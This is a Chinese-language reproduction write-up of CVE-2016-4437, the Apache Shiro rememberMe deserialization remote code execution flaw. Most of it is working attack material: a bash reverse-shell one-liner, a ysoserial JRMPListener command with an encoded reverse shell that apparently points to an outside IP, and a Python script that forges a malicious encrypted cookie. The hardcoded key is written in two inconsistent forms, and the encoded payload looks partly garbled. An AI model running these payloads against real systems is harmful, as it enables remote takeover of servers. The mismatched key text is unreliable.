CVE-2016-4437(Shiro反序列化命令执行)

1. 漏洞描述

Shiro提供了记住我(RememberMe)的功能，对cookie中的Remember me字段进行相关处理：序列化–>AES加密–>base64编码

由于Shiro本身含有一个预设的AES密钥。Base64.decode("KPHblxk5D2deZilxcaaaA==")，而shiro<1.2.4版本的AES的密钥是硬编码的，就导致攻击者可以任意构造恶意rememberMe的值造成反序列化。

2. 影响版本

Apache Shiro <= 1.2.4

3. 漏洞复现

3.1 编码反弹Shell

一句话反弹Shell：

1	bash -i >& /dev/tcp/(ip)/(port) 0>&1

在线加密站(base64加密):

https://ares-x.com/tools/runtime-exec/

3.2 启用ysoserial

1	java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+JiAvZGF2A4RjcC8xMDEuNDIuMTc4LjE3NS85OTk5IDA+JjE=}\|{base64,-d}\|{bash,-i}'

3.3 编写POC生成恶意cookie

#  pip3 install pycryptodome
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])   
    print ("rememberMe={0}".format(payload.decode()))